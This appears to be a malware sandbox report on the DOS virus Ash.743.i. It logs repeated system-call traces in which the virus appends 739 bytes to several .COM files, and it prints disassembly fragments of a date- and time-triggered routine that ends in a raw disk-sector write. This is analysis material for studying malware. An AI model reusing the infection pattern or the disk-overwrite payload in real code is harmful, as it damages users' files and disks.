Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.i

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:06:20.777302276Z 26 PC: 14146 | Set disk transfer address
2018-12-17T22:06:20.77981493Z 78 PC: 1419c | Find first file
2018-12-17T22:06:20.785497577Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:06:20.791714357Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.798333844Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.799588756Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.8020984Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.821683873Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.822918113Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.82927873Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.838877574Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.841466818Z 61 PC: 141a8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:06:20.847733318Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.854693607Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.857779395Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.860348066Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.868320406Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.870902459Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.877494256Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.885884767Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.888891749Z 61 PC: 141a8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:06:20.89514083Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.90161083Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.903257983Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.904966733Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.909867918Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.91132009Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.915355411Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.923217608Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.926075189Z 61 PC: 141a8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:06:20.933657473Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.939745434Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.94153891Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.94429014Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.952368345Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.954285412Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.961034722Z 62 PC: 14190 | Close file
2018-12-17T22:06:20.969046119Z 79 PC: 1419c | Find next file
2018-12-17T22:06:20.972338312Z 61 PC: 141a8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:06:20.978689094Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:20.984815102Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:20.987076768Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:20.989592581Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:20.997251635Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:20.998706708Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.005529476Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.013651163Z 79 PC: 1419c | Find next file
2018-12-17T22:06:21.016596319Z 61 PC: 141a8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:06:21.023097109Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:21.029636352Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:21.030941932Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.035644062Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:21.04400364Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:21.045227474Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.051582121Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.059620487Z 79 PC: 1419c | Find next file
2018-12-17T22:06:21.062060555Z 61 PC: 141a8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:06:21.06886916Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:21.075766978Z 66 PC: 141ce | Move file pointer
2018-12-17T22:06:21.077450978Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.08106726Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:06:21.089476531Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:06:21.091039736Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:21.099012953Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.107704467Z 79 PC: 1419c | Find next file
2018-12-17T22:06:21.110325922Z 61 PC: 141a8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:06:21.117023219Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:21.119484175Z 62 PC: 14190 | Close file
2018-12-17T22:06:21.121137354Z 79 PC: 1419c | Find next file
2018-12-17T22:06:21.123868508Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-17T22:06:21.126209385Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-17T22:06:21.128660352Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:29.921761149Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:29.923392766Z 78 PC: 1419c | Find first file
2018-12-25T11:44:29.930132408Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:29.937300429Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:29.945115665Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:29.94667354Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.949493664Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:29.973488212Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:29.974976527Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.982177428Z 62 PC: 14190 | Close file
2018-12-25T11:44:29.992396089Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:29.996343796Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.003697605Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.010821319Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.014746426Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.017954904Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.02785509Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.032322332Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.039664632Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.258794773Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.262816267Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.267534488Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.272260344Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.274232356Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.277109854Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.673239823Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.675458176Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.681912457Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.723727357Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.728130658Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.73572696Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.750381304Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.752019275Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.758889658Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.768298772Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.770918921Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.779564738Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.78881103Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.792054137Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.801175978Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.809564902Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.811225251Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.81510607Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.824978282Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.826414358Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.834144787Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.846147216Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.849535721Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.85729674Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.86612353Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.868157542Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.871577765Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.882311549Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.885050837Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.893343938Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.914291522Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.916583914Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.922865927Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.929129093Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.930688123Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.934781316Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.943135014Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.944932642Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.952251903Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.961379035Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.966405646Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.987019987Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.990020814Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.994594125Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.997330132Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T11:44:30.999780107Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T11:44:31.00295835Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:29.920183078Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:29.922010831Z 78 PC: 1419c | Find first file
2018-12-25T11:44:29.928858388Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:29.936087513Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:29.944753674Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:29.946574374Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.949507369Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:29.973435492Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:29.975118436Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:29.982433491Z 62 PC: 14190 | Close file
2018-12-25T11:44:29.992156882Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:29.995479762Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.002920526Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.01053446Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.012558684Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.015511778Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.024603387Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.026194964Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.033847039Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.043393624Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.047814443Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.054970565Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.061923516Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.063931019Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.0669461Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.253353187Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.255756829Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.263964919Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.673782835Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.678332768Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.683639519Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.691149611Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.692835237Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.69629085Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.723954277Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.726068672Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.735128808Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.744710209Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.747879207Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.756719796Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.764553364Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.766474639Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.770740977Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.779600686Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.781148681Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.788761784Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.796027272Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.79862701Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.805015127Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.810087472Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.811302964Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.813538456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.820529865Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.822402635Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.827412383Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.834743702Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.837421631Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.845324345Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.853615683Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.855681052Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.859215688Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.868565923Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.869760054Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.875791171Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.887105158Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.890492212Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.897806186Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.901094347Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.903958668Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.906504375Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T11:44:30.909160915Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T11:44:30.912495851Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:30.448306081Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:30.450363344Z 78 PC: 1419c | Find first file
2018-12-25T11:44:30.457270994Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:30.464521631Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:30.47258409Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:30.474113432Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:30.477096184Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:30.726095059Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:30.733881292Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:30.74201072Z 62 PC: 14190 | Close file
2018-12-25T11:44:30.752095326Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.755438266Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.764150826Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.771774233Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.773817467Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.776795892Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.786760963Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.789484576Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.798147815Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.810287858Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.815937843Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.824416562Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.83322577Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.836256035Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.83989212Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.849158674Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.851137298Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.86056808Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.870754507Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.87407144Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.882287848Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.88763602Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.898733099Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.906517841Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.925298185Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.928025047Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.936779858Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.946253053Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.949422251Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.956883822Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.96403624Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.965413843Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.968657565Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.978483605Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.980304732Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.987608162Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.997324253Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.000247713Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.006270583Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.011157106Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:31.012765324Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:31.016246419Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.026182553Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.027971408Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.035734559Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.045668992Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.049032176Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.057586447Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.064928487Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:31.067376936Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:31.070911888Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.081239821Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.08330868Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.09027581Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.098123597Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.100953923Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.10679352Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.109277394Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.111584943Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.113833742Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T11:44:31.115990549Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T11:44:31.119746615Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:30.588537518Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:30.59079266Z 78 PC: 1419c | Find first file
2018-12-25T11:44:30.598459344Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:30.605749764Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:30.613898789Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:30.615415288Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
